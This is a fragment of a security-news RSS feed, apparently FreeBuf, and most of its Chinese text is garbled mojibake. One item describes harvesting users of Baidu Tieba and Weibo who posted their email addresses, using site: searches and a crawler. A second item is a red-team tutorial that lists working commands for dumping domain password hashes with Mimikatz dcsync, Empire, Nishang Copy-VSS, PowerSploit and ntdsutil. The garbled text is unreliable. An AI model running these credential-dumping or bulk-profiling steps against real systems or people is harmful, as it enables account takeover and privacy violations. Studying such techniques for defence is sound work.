基于上述结论,有如下推测:若将SNS的用户有特定需求包括ä¸é™äºŽå…±äº«æ€§éœ€æ±‚æ—¶ï¼Œè®°ä¸ºä¸€ä¸ªè§¦å‘æ¡ä»¶ã€‚éšç§æ‚–论导致的éšç§æ³„露,为å¶ç„¶äº‹ä»¶ã€‚则éé‡è¯¥äº‹ä»¶çš„用户在æ£å¸¸æ´»åŠ¨ä¸Žæ³„éœ²éšç§ä¸¤ç§çжæ€ä¸éšæ—¶åˆ‡æ¢ã€‚å½“è§¦å‘æ¡ä»¶æ»¡è¶³æ—¶ï¼Œç”¨æˆ·ç‰ºç‰²ä¸ªäººéšç§æ¢å–满足需求;而在需求满足åŽï¼Œåˆç»§ç»æ£å¸¸çš„社交活动。所以该类用户属于普通用户的å集,且未必是真å集。 五ã€å»ºè®®çš„解决办法  SNSæœåŠ¡ç«¯çš„å®‰å…¨ç–ç•¥ 1)创建资æºå…±äº«ç‰¹æ®ŠåŸŸï¼Œç”¨ä»¥èµ„æºå…±äº«åŠåˆ†å‘,完æˆç«™å†…资æºäº¤æµï¼Œé¿å…SNS之间产生交å‰ï¼Œå¯¼è‡´ç”¨æˆ·SNS间关系被攻击者连接。 2)以用户关系深度作为信任度。 3)资æºå…±äº«åŒºåŸŸä¿¡æ¯å¯¹ä½Žä¿¡ä»»åº¦ç”¨æˆ·ä¸å¯è§ï¼Œè¿‡æ»¤éƒ¨åˆ†éžæ´»è·ƒSNSæ”»å‡»è€…åŠæ”»å‡»è´¦æˆ·ï¼Œå¢žåŠ æ”»å‡»æˆæœ¬ã€‚ 4)进入资æºå…±äº«åŒºåŸŸéœ€è¦SNSäº¤æµæŸè€—(包括ä¸é™äºŽè®ºå›å¸),进一æ¥å¢žåŠ æ”»å‡»æˆæœ¬ï¼Œé¿å…å‡ºçŽ°å¤§è§„æ¨¡æ‰¹é‡æ”»å‡»ã€‚ 通过隔离开SNSä¸ç”¨æˆ·å…±äº«æ€§éœ€æ±‚与表达性需求的实现区域,将éšç§ä¿¡æ¯åˆ†ç¦»å¹¶ä¿æŠ¤èµ·æ¥ã€‚并且通过æƒé™è®¾ç½®ä»¥åŠæœ‰å¿èŽ·å–在ä¸å½±å“ç”¨æˆ·ä½¿ç”¨çš„æƒ…å†µä¸‹å¢žåŠ èŽ·å–éš¾åº¦ã€‚å¢žåŠ æ”»å‡»è€…è‡ªåŠ¨åŒ–æ”»å‡»SNSçš„æˆæœ¬ï¼Œå¢žåŠ äº†æ”»å‡»è€…è¿›è¡Œç¤¾ä¼šå·¥ç¨‹å¦æ”»å‡»çš„éš¾åº¦ï¼Œä»Žè€Œä¿æŠ¤äº†ç”¨æˆ·çš„ä¿¡æ¯å®‰å…¨ã€‚ æœç´¢å¼•擎端的使用é™åˆ¶ 1)制作SNS网站åå•,收录该åå•内信æ¯ï¼Œå¹¶æä¾›æ™®é€šæ£€ç´¢æœåŠ¡ã€‚ä¸æä¾›æˆ–æœ‰é™åˆ¶æä¾›å¦‚site,inurlç‰è¯æ³•的使用。 2)对æœç´¢è¯å¥è¿›è¡Œåˆ†æžï¼Œå¦‚å‘çŽ°åŒ…å«æ•感信æ¯ä¸”ä½¿ç”¨äº†é«˜çº§è¯æ³•ï¼Œåˆ™æ‹’ç»æœåŠ¡ã€‚ 3)使用IP白åå•ç–ç•¥ï¼Œä»…å¯¹æŒ‡å®šæ•™è‚²æˆ–ç ”ç©¶æœºæž„IP段æä¾›é«˜çº§è¯æ³•æœåŠ¡ 4)å…³é—é«˜çº§è¯æ³• 上述四æ¡å¯è¡Œæ€§ä¾æ¬¡é€’å‡ï¼Œå®‰å…¨æ€§ä¾æ¬¡é€’增。è¯è¯´ç™¾åº¦ç½‘盘都能过滤,给自家贴å§è¿‡æ»¤ä¸€ä¸‹å¾ˆè¿‡åˆ†ï¼Ÿ 最åŽï¼Œæ±‚æ»ä¾2。 *æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚]]></description>
1326 <content:encoded><![CDATA[</p>
1327<p><b style="color: rgb(239, 71, 71);">*æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚</b> </p>
1328<blockquote><p>楼主:我有æ»ä¾2资æºï¼Œè¦çš„留邮箱ï¼</p>
1329<p>åƒç“œçš„æˆ‘:楼主好人一生平安~01010101@qq.com,谢谢。</p>
1330</blockquote>
1331<p><b>æŸä¸ªé—²çš„æ— èŠçš„人: site:tieba.baidu.com 01010101@qq.com </b></p>
1332<p><b style="color: rgb(0, 176, 80);">本文主è¦ä»¥ç™¾åº¦è´´å§å’Œå¾®åšä¸ºä¾‹ï¼Œåˆ†æžæŽ¢è®¨ç¤¾äº¤ç½‘络上的éšç§ä¸»åŠ¨æ³„éœ²çŽ°è±¡ã€‚</b></p>
1333<h2>一ã€ä¸»è¦æ€è·¯</h2>
1334<p>如果是针对个体用户,比如<b>已知个人信æ¯</b>,且这个信æ¯å¯ä»¥ä¸Žå…¶ç¤¾äº¤ç½‘络ä¸çš„æŸè´¦æˆ·å½¢æˆå•射关系。那么利用信æ¯Xæž„é€ payload,直接使用百度的siteè¯æ³•å¯¹ç›®æ ‡SNS进行检索å³å¯ã€‚</p>
1335<p><b style="">æ¤æ—¶ä¸ä¸€å®šèƒ½å¤ŸèŽ·å–足够的数æ®ï¼Œå› 为å•ä¸€ç›®æ ‡æ˜¯å¦æ›¾æ³„露éšç§æ˜¯ä¸€ä¸ªæœªçŸ¥æ•°ï¼Œå…¶SNSä½¿ç”¨æ·±åº¦ä¹Ÿæ˜¯æœªçŸ¥æ•°ã€‚å› æ¤ï¼Œæ”¹ä½¿ç”¨æ•感信æ¯çš„通é…体进行检索,先获å–用户集åˆï¼Œå†èŽ·å–å‘言情况。具体æµç¨‹å¦‚下:</b></p>
1336<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319713448989.png!small" width="690" height="637"><b style="color: rgb(38, 38, 38);"><br /></b></p>
1337<h2><b style="color: rgb(38, 38, 38);">二ã€é’ˆå¯¹å•一用户的工具实现</b></h2>
1338<p>å› ä¸ºä»£ç æ°´å¹³å¤ªå·®æˆ‘就䏿”¾github了,emmmm其实就是简å•的爬虫,具体的架构如下:</p>
1339<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319721103599.png!small" width="690" height="704.2758620689655">éƒ¨åˆ†æ ¸å¿ƒåŠŸèƒ½ä»£ç åŠæ³¨é‡Šå¦‚下:</p>
1340<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319721622658.png!small" width="690" height="574"><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/153197223251.png!small" width="690" height="793">那么完æˆçš„æ•ˆæžœå°±æ˜¯ï¼Œè¾“å…¥æŸä¸€ä¸ªä¿¡æ¯ï¼Œå®ƒè¿”å›žç»™ä½ æŒ‡å®šç¤¾äº¤ç½‘ç»œä¸ä¸Žå…¶ç›¸å…³çš„ç”¨æˆ·ã€‚ä½ ç¡®å®šç”¨æˆ·å,它继ç»çˆ¬å–该用户的所有å‘言记录。以åŽç¿»ä¸œè¥¿å†ä¹Ÿä¸ç”¨è‡ªå·±æ…¢æ…¢æ‰¾äº†~</p>
1341<p><span style="color: rgb(239, 71, 71);">å¦å¤–由于比较懒,åªåšäº†è´´å§åŠå¾®åšä¸¤ä¸ªSNS</span></p>
1342</p>
1343<h2>ä¸‰ã€æ€è·¯æŽ¨å¹¿ï¼Œå³èŽ·å–大釿•°æ®çš„æ–¹æ³•</h2>
1344</p>
1345</p>
1346<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/1531972477215.png!small" width="690" height="413">说起æ¥éº»çƒ¦ï¼Œå…¶å®žå°±æ˜¯ç®€å•替æ¢äº†ä¸ªpayload,ä¸å†å±€é™äºŽçœ‹æŸä¸ªäººï¼Œè€Œæ˜¯ummmä½ ä»¬è¿™äº›ç•™è¿‡é‚®ç®±çš„éƒ½ç»™æˆ‘è¿‡æ¥ã€‚最åŽå¦‚上图所说,拿了个23MB的文本。</p>
1347</p>
1348</p>
1349<p>ç”±äºŽæœ‰å¤§é‡æ£åˆ™æ“ä½œï¼Œçˆ¬è™«è·‘çš„å¾ˆæ…¢ï¼Œåœ¨äº‘ä¸Šè·‘äº†æœ‰ä¸ªå››äº”å¤©æ‰æŠŠè¿™ä¸ƒåƒå¤šä¸ªç”¨æˆ·è·‘å®Œã€‚åŠ äº†å¤šçº¿ç¨‹ä½†æ˜¯ä¼¼ä¹Žæ²¡æœ‰ä»€ä¹ˆæ”¹å–„ï¼Ÿ</p>
1350</p>
1351</p>
1352<h2>å››ã€æ–‡æœ¬è¯æ–™å¤„ç†</h2>
1353</p>
1354</p>
1355<h3>4.1 è¯æ–™é¢„处ç†åŠåŽç»æ“作</h3>
1356</p>
1357</p>
1358<p>æ¤æ—¶æ‰‹é‡Œæœ‰ä¸€å¤§æ‰¹ä¸»åŠ¨æ³„éœ²ä¸ªäººéšç§çš„用户å‘言,那当然è¦åˆ†æžä¸€æ³¢ã€‚分æžå‰ï¼Œå…ˆæ´—ä¸€æ³¢è¯æ–™ï¼Œä¹‹åŽåˆ†è¯åŠ å‘é‡åŒ–ã€‚å…·ä½“ä¸»è¦æ¥éª¤å¦‚下:</p>
1359</p>
1360</p>
1361<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319727874450.png!small" width="690" height="299"> </p>
1362</p>
1363</p>
1364<p>去åœç”¨è¯æœ‰ç”¨æ£åˆ™æœ‰ç”¨ç»“巴,具体åœç”¨è¯åº“æ˜¯å‡ ä¸ªé™¢æ ¡çš„åˆè®¢ç‰ˆã€‚å‘é‡åŒ–直接word2vec,其实SNSå‘言包å«å¤§é‡çš„çŸè¯å’ŒçŸå¯¹è¯ï¼Œä½¿ç”¨æ–‡æœ¬å‘é‡å¯èƒ½æ›´å¥½ï¼Œä½†ç¬”者技术有é™ä¹Ÿæ¯”较懒,直接分è¯ç”¨è¯å‘é‡åšäº†ã€‚</p>
1365</p>
1366</p>
1367<h3><b style="">4.2 对照组选择</b></h3>
1368</p>
1369</p>
1370<p>对照组的选择其实比较麻烦,按æ£å¸¸æ¥è¯´ï¼Œæ¤æ—¶èŽ·å¾—çš„æ˜¯ä¸»åŠ¨æ³„éœ²éšç§çš„ä¸å®‰å…¨ç”¨æˆ·çš„å‘è¨€ï¼Œä½ å¯¹ç…§è¯¥é€‰ä¸ªå®‰å…¨ç”¨æˆ·ã€‚å¯å®‰å…¨ç”¨æˆ·å¤ªéš¾ç•Œå®šäº†ï¼Œå³æˆ‘找到一æ¡ä½ 留有个人éšç§çš„å‘è¨€ä½ å°±æ˜¯ä¸å®‰å…¨çš„,å¯ä½ è¦æ‰€æœ‰å‘è¨€éƒ½æ²¡æœ‰é—®é¢˜æ‰æ˜¯å®‰å…¨çš„。这里å·å·¥å‡æ–™é€‰ç”¨2012å¹´ccf的微åšåˆ†æžæ–‡æœ¬ã€‚é•¿è¿™ä¸ªæ ·å:</p>
1371</p>
1372</p>
1373<p><img alt="image.png以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319733462915.png!small" width="690" height="602"> </p>
1374</p>
1375</p>
1376<h3><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/1531973329613.png!small" width="690" height="415"><b style="">4.3 å¯è§†åŒ–结果</b></h3>
1377</p>
1378</p>
1379<p>其实å‘é‡åŒ–过程ä¸ï¼Œåˆå§‹æ˜¯3M+个300ç»´å‘é‡ï¼Œç„¶åŽé™ç»´åˆ°äºŒç»´çš„è¯ï¼Œæˆ‘çš„å°ç ´æœ¬æœ‰ç‚¹è·‘ä¸åŠ¨ï¼Œå°±åœ¨åˆ†è¯é˜¶æ®µæŒ‰ç…§æƒé‡å…ˆåšäº†ä¸ªç›é€‰ã€‚对更具有代表性的若干个å‘é‡è¿›è¡Œäº†é™ç»´ã€‚如下图所示,这是å‰ä¸‰æ¬¡ï¼š</p>
1380</p>
1381</p>
1382<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/1531973421140.png!small" width="690" height="385">å¯ä»¥çœ‹åˆ°è“è‰²å¯¹ç…§ç»„ï¼Œæ¤æ—¶å˜åœ¨å°è§„模的èšç±»æƒ…况,这是由于对照组文本本身具有一定的è¯é¢˜æ€§ã€‚</p>
1383</p>
1384</p>
1385<p>而当æƒé‡ä¸ºTop20k时,对照情况如下:</p>
1386</p>
1387</p>
1388<p><img alt="以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž" src="http://image.3001.net/images/20180719/15319736119650.png!small" width="690" height="345"> </p>
1389</p>
1390</p>
1391<p>与之å‰ä¸‰æ¬¡å®žéªŒæœ‰æ‰€ä¸åŒï¼Œéšç€è€ƒè™‘范围的扩大,对照组的å°è§„模èšç±»æƒ…å†µä¹Ÿé€æ¸æ¶ˆå¤±ã€‚两组å‘é‡åˆ†å¸ƒèŒƒå›´æŽ¥è¿‘ï¼Œæ— æ˜Žæ˜¾å·®å¼‚ã€‚æ¤æ—¶è¯æ˜Žï¼ŒSNSéšç§æ‚–论导致的泄露éšç§ç”¨æˆ·ï¼Œåœ¨å‘è¨€ä¸Šä¸Žä¸€èˆ¬ç”¨æˆ·æ— æ˜Žæ˜¾å·®å¼‚ï¼Œå‘è¨€æ— æ˜Žæ˜¾èšç±»ã€‚<b>å³é€šè¿‡å‘è¨€åˆ¤æ–æŸç”¨æˆ·æ˜¯å¦å˜åœ¨å®‰å…¨éšæ‚£ï¼Œä¸å¯è¡Œã€‚</b></p>
1392</p>
1393</p>
1394<p>基于上述结论,有如下推测:<b>若将SNS的用户有特定需求包括ä¸é™äºŽå…±äº«æ€§éœ€æ±‚æ—¶ï¼Œè®°ä¸ºä¸€ä¸ªè§¦å‘æ¡ä»¶ã€‚éšç§æ‚–论导致的éšç§æ³„露,为å¶ç„¶äº‹ä»¶ã€‚则éé‡è¯¥äº‹ä»¶çš„用户在æ£å¸¸æ´»åŠ¨ä¸Žæ³„éœ²éšç§ä¸¤ç§çжæ€ä¸éšæ—¶åˆ‡æ¢ã€‚å½“è§¦å‘æ¡ä»¶æ»¡è¶³æ—¶ï¼Œç”¨æˆ·ç‰ºç‰²ä¸ªäººéšç§æ¢å–满足需求;而在需求满足åŽï¼Œåˆç»§ç»æ£å¸¸çš„社交活动。所以该类用户属于普通用户的å集,且未必是真å集。</b></p>
1395<h2>五ã€å»ºè®®çš„解决办法</h2>
1396</p>
1397</p>
1398<h3> SNSæœåŠ¡ç«¯çš„å®‰å…¨ç–ç•¥</h3>
1399</p>
1400<blockquote><p>1)创建资æºå…±äº«ç‰¹æ®ŠåŸŸï¼Œç”¨ä»¥èµ„æºå…±äº«åŠåˆ†å‘,完æˆç«™å†…资æºäº¤æµï¼Œé¿å…SNS之间产生交å‰ï¼Œå¯¼è‡´ç”¨æˆ·SNS间关系被攻击者连接。</p>
1401<p>2)以用户关系深度作为信任度。</p>
1402<p>3)资æºå…±äº«åŒºåŸŸä¿¡æ¯å¯¹ä½Žä¿¡ä»»åº¦ç”¨æˆ·ä¸å¯è§ï¼Œè¿‡æ»¤éƒ¨åˆ†éžæ´»è·ƒSNSæ”»å‡»è€…åŠæ”»å‡»è´¦æˆ·ï¼Œå¢žåŠ æ”»å‡»æˆæœ¬ã€‚</p>
1403<p>4)进入资æºå…±äº«åŒºåŸŸéœ€è¦SNSäº¤æµæŸè€—(包括ä¸é™äºŽè®ºå›å¸),进一æ¥å¢žåŠ æ”»å‡»æˆæœ¬ï¼Œé¿å…å‡ºçŽ°å¤§è§„æ¨¡æ‰¹é‡æ”»å‡»ã€‚</p>
1404</blockquote>
1405</p>
1406<p><b style="">通过隔离开SNSä¸ç”¨æˆ·å…±äº«æ€§éœ€æ±‚与表达性需求的实现区域,将éšç§ä¿¡æ¯åˆ†ç¦»å¹¶ä¿æŠ¤èµ·æ¥ã€‚并且通过æƒé™è®¾ç½®ä»¥åŠæœ‰å¿èŽ·å–在ä¸å½±å“ç”¨æˆ·ä½¿ç”¨çš„æƒ…å†µä¸‹å¢žåŠ èŽ·å–éš¾åº¦ã€‚å¢žåŠ æ”»å‡»è€…è‡ªåŠ¨åŒ–æ”»å‡»SNSçš„æˆæœ¬ï¼Œå¢žåŠ äº†æ”»å‡»è€…è¿›è¡Œç¤¾ä¼šå·¥ç¨‹å¦æ”»å‡»çš„éš¾åº¦ï¼Œä»Žè€Œä¿æŠ¤äº†ç”¨æˆ·çš„ä¿¡æ¯å®‰å…¨ã€‚</b></p>
1407</p>
1408</p>
1409<h3>æœç´¢å¼•擎端的使用é™åˆ¶</h3>
1410</p>
1411<blockquote><p>1)制作SNS网站åå•,收录该åå•内信æ¯ï¼Œå¹¶æä¾›æ™®é€šæ£€ç´¢æœåŠ¡ã€‚ä¸æä¾›æˆ–æœ‰é™åˆ¶æä¾›å¦‚site,inurlç‰è¯æ³•的使用。</p>
1412<p>2)对æœç´¢è¯å¥è¿›è¡Œåˆ†æžï¼Œå¦‚å‘çŽ°åŒ…å«æ•感信æ¯ä¸”ä½¿ç”¨äº†é«˜çº§è¯æ³•ï¼Œåˆ™æ‹’ç»æœåŠ¡ã€‚</p>
1413<p>3)使用IP白åå•ç–ç•¥ï¼Œä»…å¯¹æŒ‡å®šæ•™è‚²æˆ–ç ”ç©¶æœºæž„IP段æä¾›é«˜çº§è¯æ³•æœåŠ¡</p>
1414<p>4)å…³é—é«˜çº§è¯æ³•</p>
1415</blockquote>
1416</p>
1417<p><b>上述四æ¡å¯è¡Œæ€§ä¾æ¬¡é€’å‡ï¼Œå®‰å…¨æ€§ä¾æ¬¡é€’增。è¯è¯´ç™¾åº¦ç½‘盘都能过滤,给自家贴å§è¿‡æ»¤ä¸€ä¸‹å¾ˆè¿‡åˆ†ï¼Ÿ</b></p>
1418<p><b>最åŽï¼Œæ±‚æ»ä¾2。</b><span></span></p>
1419<p><b style="color: rgb(239, 71, 71);">*æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚</b></p>
1420]]></content:encoded>
1421 <wfw:commentRss>http://www.freebuf.com/articles/neopoints/178013.html/feed</wfw:commentRss>
1422 <slash:comments>22</slash:comments>
1423 </item>
1424 <item>
1425 <title>导出域密ç å“ˆå¸Œå€¼çš„å¤šç§æ–¹æ³•介ç»</title>
1426 <link>http://www.freebuf.com/articles/system/177764.html</link>
1427 <comments>http://www.freebuf.com/articles/system/177764.html#comments</comments>
1428 <pubDate>Wed, 25 Jul 2018 05:00:29 +0000</pubDate>
1429 <dc:creator>secist</dc:creator>
1430 <category><![CDATA[系统安全]]></category>
1431 <category><![CDATA[hash]]></category>
1432 <category><![CDATA[密ç ]]></category>
1433
1434 <guid isPermaLink="false">http://www.freebuf.com/?p=177764</guid>
1435 <description><![CDATA[在域内HASH是å˜åœ¨NTDS.DITä¸çš„, NTDS.DIT是一个二进制文件,就ç‰åŒäºŽæœ¬åœ°è®¡ç®—机的SAMæ–‡ä»¶ï¼Œå®ƒçš„å˜æ”¾ä½ç½®æ˜¯%SystemRoot%\ntds\NTDS.DIT。这里é¢åŒ…å«çš„ä¸åªæ˜¯Usernameå’ŒHASH,还有OUã€Groupç‰ä¿¡æ¯ã€‚ å’ŒSAMæ–‡ä»¶ä¸€æ ·ï¼Œè¯¥æ–‡ä»¶ä¹Ÿæ˜¯è¢«ç³»ç»Ÿé”å®šçš„ã€‚å› æ¤ï¼Œæˆ‘ä»¬ä¹Ÿæ— æ³•ç›´æŽ¥å°†å…¶å¤åˆ¶å¹¶æ‹·è´è‡³å…¶å®ƒä½ç½®ï¼Œä»¥æå–å…¶ä¸çš„ä¿¡æ¯ã€‚ ä»¥ä¸‹æ˜¯å‡ ç§æœ€å¸¸è§çš„被用于æå–.dit文件信æ¯çš„æŠ€æœ¯ï¼š 1.Domain Controller Replication Services(域控制器å¤åˆ¶æœåŠ¡ï¼‰ 2.Native Windows Binaries 3.WMI Mimikatz Mimikatz有一个功能(dcsync),利用目录å¤åˆ¶æœåŠ¡ï¼ˆDRS)从NTDS.DITæ–‡ä»¶ä¸æ£€ç´¢å¯†ç 哈希值。该技术消除了直接从域控制器进行认è¯çš„å¿…è¦æ€§ï¼Œå› 为它å¯ä»¥ä»ŽåŸŸç®¡ç†å‘˜çŽ¯å¢ƒä¸å±žäºŽåŸŸçš„ä»»æ„ç³»ç»Ÿæ‰§è¡Œã€‚å› æ¤ï¼Œè¿™ä¹Ÿæ˜¯ä¸€é¡¹ç”¨äºŽçº¢é˜Ÿçš„æ ‡å‡†æŠ€æœ¯ã€‚ lsadump::dcsync /domain:pentestlab.local /all /csv 通过使用/user傿•°æŒ‡å®šåŸŸç”¨æˆ·å,Mimikatzä¼šå°†è¯¥æŒ‡å®šç”¨æˆ·çš„æ‰€æœ‰å¸æˆ·ä¿¡æ¯è½¬å‚¨åŒ…括哈希值。 lsadump::dcsync /domain:pentestlab.local /user:test 或者我们å¯ä»¥ç›´æŽ¥åœ¨åŸŸæŽ§åˆ¶å™¨ä¸æ‰§è¡ŒMimikatz,通过lsass.exe进程dump密ç 哈希。 privilege::debug lsadump::lsa /inject æ¤æ—¶ï¼Œå°†ä¼šæ£€ç´¢åŸŸç”¨æˆ·çš„密ç 哈希值。 Empire PowerShell Empire有两个模å—,å¯ä»¥é€šè¿‡DCSync攻击检索域哈希。 这两个模å—都需è¦ä»¥åŸŸç®¡ç†å‘˜çš„æƒé™æ‰§è¡Œï¼Œå¹¶ä¸”他们都使用Microsoftå¤åˆ¶æœåŠ¡ã€‚è¿™ä¸¤ä¸ªæ¨¡å—ä¾èµ–于Invoke-Mimikatz PowerShellè„šæœ¬ï¼Œæ¥æ‰§è¡Œä¸ŽDCSync相关的Mimikatz命令。以下模å—的哈希æå–æ ¼å¼ç±»ä¼¼äºŽMetasploit hashdumpçš„è¾“å‡ºæ ¼å¼ã€‚ usemodule credentials/mimikatz/dcsync_hashdump DCSync模å—éœ€è¦æˆ‘们指定用户,以æå–叿ˆ·çš„æ‰€æœ‰ä¿¡æ¯ã€‚ 执行完æˆåŽï¼Œæˆ‘们将获å–到以下信æ¯ï¼š Nishang Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载è·çš„一个集åˆï¼Œå¹¶è¢«å¹¿æ³›åº”ç”¨äºŽæ¸—é€æµ‹è¯•çš„å„个阶段。Copy-VSS脚本å¯ç”¨äºŽè‡ªåŠ¨åŒ–çš„æå–需è¦çš„æ–‡ä»¶ï¼šNTDS.DIT,SAMå’ŒSYSTEM。这些文件将被æå–到当å‰çš„å·¥ä½œç›®å½•æˆ–ä½ æŒ‡å®šçš„æ–‡ä»¶å¤¹ä¸ã€‚ Import-Module .\Copy-VSS.ps1 Copy-VSS Copy-VSS -DestinationDir C:\ShadowCopy\ 或者,å¯ä»¥é€šè¿‡åŠ è½½PowerShell扩展,æ¥ä»ŽçŽ°æœ‰çš„Meterpreter会è¯ä¸æ‰§è¡Œè„šæœ¬ã€‚ load powershell powershell_import /root/Copy-VSS.ps1 powershell_execute Copy-VSS 也å¯ä»¥ä½¿ç”¨powershell_shell命令建立一个PowerShell会è¯ï¼Œé€šè¿‡å¯¼å…¥è„šæœ¬æ¥æå–æ–‡ä»¶ã€‚ Copy-VSS Copy-VSS -DestinationDir C:\Ninja PowerSploit PowerSploit包å«PowerShell脚本,该脚本使用å·å½±å¤åˆ¶æœåŠ¡åˆ›å»ºå¯ç”¨äºŽæå–文件的新å·ã€‚ Import-Module .\VolumeShadowCopyTools.ps1 New-VolumeShadowCopy -Volume C:\ Get-VolumeShadowCopy æˆ–è€…é€šè¿‡åŠ è½½PowerShell扩展,从现有的Meterpreter会è¯ä¸æ‰§è¡Œã€‚ powershell_shell New-VolumeShadowCopy -Volume C:\ Get-VOlumeShadowCopy å¯ä»¥ä½¿ç”¨copy命令将文件从新å·å¤åˆ¶åˆ°ç›®æ ‡ã€‚ Invoke-DCSync Invoke-DCSync是一个由Nick Landerså’Œleverages PowerViewå¼€å‘çš„PowerShell脚本,Invoke-ReflectivePEInjectionå’ŒPowerKatcher使用Mimikatzçš„DCSyncæ–¹æ³•æ¥æ£€ç´¢å“ˆå¸Œå€¼ã€‚直接执行该函数将生æˆä»¥ä¸‹è¾“出: Invoke-DCSync å¯ä»¥çœ‹åˆ°ç»“æžœæ˜¯ä»¥è¡¨æ ¼çš„å½¢å¼è¾“å‡ºçš„ã€‚å¦‚æžœæˆ‘ä»¬æ·»åŠ -PWDumpFormat傿•°ï¼Œåˆ™è¾“å‡ºæ ¼å¼ä¸ºuser:id:lm:ntlm::: Invoke-DCSync -PWDumpFormat 从现有的Meterpreter会è¯ä¸è¿è¡Œè„šæœ¬ï¼Œå¯ä»¥èŽ·å–到相åŒçš„输出结果。 æ·»åŠ -PWDumpFormat傿•°åŽï¼š ntdsutil ntdsutil是一个命令行工具,是域控制器生æ€ç³»ç»Ÿçš„一部分,其主è¦ç”¨é€”是使管ç†å‘˜èƒ½å¤Ÿè½»æ¾è®¿é—®å’Œç®¡ç†Windows Active Directoryæ•°æ®åº“ã€‚ä½†å®ƒå¸¸è¢«æ¸—é€æµ‹è¯•人员或红队队员滥用æ¥èŽ·å–现有的ntds.dit文件快照,并且å¯ä»¥å°†è¯¥æ–‡ä»¶å¤åˆ¶åˆ°æ–°çš„租约ä¸ï¼Œä»¥è¿›è¡Œç¦»çº¿çš„分æžå’Œå¯†ç 哈希的æå–。 ntdsutil activate instance ntds ifm create full C:\ntdsutil quit quit 它将为我们生æˆä¸¤ä¸ªæ–°æ–‡ä»¶å¤¹ï¼šActive Directoryå’ŒRegistry。NTDS.DIT文件将被ä¿å˜åˆ°Active Directoryä¸ï¼Œè€ŒSAMå’ŒSYSTEM文件则将被ä¿å˜åˆ°Registry文件夹ä¸ã€‚ DiskShadow […]]]></description>
1436 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);"></b></p>
1437<p><b style="color: rgb(0, 176, 80);">在域内HASH是å˜åœ¨NTDS.DITä¸çš„, NTDS.DIT是一个二进制文件,就ç‰åŒäºŽæœ¬åœ°è®¡ç®—机的SAMæ–‡ä»¶ï¼Œå®ƒçš„å˜æ”¾ä½ç½®æ˜¯%SystemRoot%\ntds\NTDS.DIT。这里é¢åŒ…å«çš„ä¸åªæ˜¯Usernameå’ŒHASH,还有OUã€Groupç‰ä¿¡æ¯ã€‚</b></p>
1438<p>å’ŒSAMæ–‡ä»¶ä¸€æ ·ï¼Œè¯¥æ–‡ä»¶ä¹Ÿæ˜¯è¢«ç³»ç»Ÿé”å®šçš„ã€‚å› æ¤ï¼Œæˆ‘ä»¬ä¹Ÿæ— æ³•ç›´æŽ¥å°†å…¶å¤åˆ¶å¹¶æ‹·è´è‡³å…¶å®ƒä½ç½®ï¼Œä»¥æå–å…¶ä¸çš„ä¿¡æ¯ã€‚</p>
1439<p>ä»¥ä¸‹æ˜¯å‡ ç§æœ€å¸¸è§çš„被用于æå–.dit文件信æ¯çš„æŠ€æœ¯ï¼š</p>
1440<p>1.Domain Controller Replication Services(域控制器å¤åˆ¶æœåŠ¡ï¼‰</p>
1441<p>2.Native Windows Binaries</p>
1442<p>3.WMI</p>
1443<h2>Mimikatz</h2>
1444<p>Mimikatz有一个功能(dcsync),利用目录å¤åˆ¶æœåŠ¡ï¼ˆDRS)从NTDS.DITæ–‡ä»¶ä¸æ£€ç´¢å¯†ç 哈希值。该技术消除了直接从域控制器进行认è¯çš„å¿…è¦æ€§ï¼Œå› 为它å¯ä»¥ä»ŽåŸŸç®¡ç†å‘˜çŽ¯å¢ƒä¸å±žäºŽåŸŸçš„ä»»æ„ç³»ç»Ÿæ‰§è¡Œã€‚å› æ¤ï¼Œè¿™ä¹Ÿæ˜¯ä¸€é¡¹ç”¨äºŽçº¢é˜Ÿçš„æ ‡å‡†æŠ€æœ¯ã€‚</p>
1445<pre><code>lsadump::dcsync /domain:pentestlab.local /all /csv</code></pre>
1446<p><img alt="1mimikatz-dump-domain-hashes-via-dcsync-clear-version.png" src="http://image.3001.net/images/20180717/15317924197656.png!small" width="690" height="432"></p>
